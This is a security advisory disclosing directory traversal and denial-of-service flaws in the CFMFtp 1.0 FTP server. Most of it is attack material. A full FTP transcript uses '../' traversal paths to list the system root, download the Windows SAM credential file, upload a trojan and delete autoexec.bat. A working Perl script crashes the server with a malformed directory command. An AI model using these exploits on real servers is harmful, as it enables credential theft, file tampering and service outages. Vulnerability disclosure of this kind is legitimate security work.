Multiple vulnerabilities found in CFMFtp 1.0 CFPablo.Com, Inc (FTP Service) Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY The world's only database driven FTP Server. Full FTP Server that allows you the ability to run your users administration via a database, this is a plus because if you run a 'DYNAMIC' website that has database connection capabilities, you can allow your users via the web to configure and maintain their accounts login and password information. Unlike those other FTP servers out there." A directory traversal vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory. The FTPd is also vulnerable to a DoS attack -----[DETAILS Vulnerable systems: Windows NT 4.0 and Windows 2000 server fully patched * CFMFtp 1.0 Immune systems: * None CFMFtp version 1.0 failure to filter out "\.." and "/.." sequences in specific command requests allowing a remote users to break out of restricted directories and gain read access to the system directory structure; Possibility for discovering the directory structure outside the configured areas. It is also possible to send, receive and delete files from outside the restricted areas. This can as demonstrated in the sample exploitation result in a Trojan can be put on the server and files can be deleted. The server is also vulnerable to a DoS attack the puts the CPU usage on the server to 100%. The CPU changes to normal when the FTPd is killed manually on the server. The following transcript demonstrates a sample exploitation of the vulnerabilities: -------------------- DIRECTORY TRAVERSAL VULNERABILITY --------------------------- To 192.168.1.199 Connected to 192.168.1.199. 220- CFM-Resources.Com FTPServ (1.0) - Welcome! 220 ************************************************* User (192.168.1.199:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. iissamples/ scripts/ wwwroot/ 226 Listing complete. ftp: 33 bytes received in 0,00Seconds 33000,00Kbytes/sec. ftp> cd .. 550 Access denied ftp> cd ... 550 Access denied ftp> cd / 250 CWD command successful. ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. iissamples/ scripts/ wwwroot/ 226 Listing complete. ftp: 33 bytes received in 0,00Seconds 33000,00Kbytes/sec. ftp> cd \ 250 CWD command successful. ftp> dir 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. drwxr-xr-x 1 User Group 0 Dec 23 22:31 iissamples drwxr-xr-x 1 User Group 0 Dec 23 23:16 scripts drwxr-xr-x 1 User Group 0 Dec 23 22:31 wwwroot 226 Listing complete. ftp: 201 bytes received in 0,01Seconds 20,10Kbytes/sec. ftp> cd \..\..\ 550 Access denied ftp> cd /../../ 550 Access denied ftp> dir /../../ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys drwxr-xr-x 1 User Group 0 Jan 23 12:21 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Jan 23 12:21 TEMP drwxr-xr-x 1 User Group 0 Jan 23 12:21 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,07Seconds 16,87Kbytes/sec. ftp> dir \..\..\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys drwxr-xr-x 1 User Group 0 Jan 23 12:21 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Jan 23 12:21 TEMP drwxr-xr-x 1 User Group 0 Jan 23 12:21 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,13Seconds 9,08Kbytes/sec. ftp> get /../../winnt/repair/sam._ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Transfer complete. ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec. ftp> send eviltrojan.exe eviltrojan.exe: File not found ftp> send Local file evil_trojan.exe Remote file command.exe 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Transfer complete. ftp: 5528745 bytes sent in 27,53Seconds 200,83Kbytes/sec. ftp> delete \..\..\autoexec.bat 250 delete command successful. ftp> dir /../../ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys drwxr-xr-x 1 User Group 0 Jan 23 12:21 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Jan 23 12:21 TEMP drwxr-xr-x 1 User Group 0 Jan 23 12:21 WINNT 226 Listing complete. ftp: 1110 bytes received in 0,11Seconds 10,09Kbytes/sec. ftp> bye 221 Goodbye. -------------------- DoS Exploit code --------------------------- #!/usr/bin/perl # # CFMFtp V1.0 # Dennis Rand # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # # use Net::FTP; $target = shift() || die "usage: target ip"; my $user = "anonymous"; my $pass = "anonymous"; system('cls'); print "CFMFtp V1.0 DoS attack\n"; print "Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!"; $ftp->login($user, $pass) || die "could not login: $!"; $ftp->cwd("/"); print "Sending CRASH REQUEST...\n"; $ftp->cwd("cd @/..@/.."); $ftp->quit; -------------------- DoS Exploit code --------------------------- -----[DETECTION CFMFtp 1.0 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.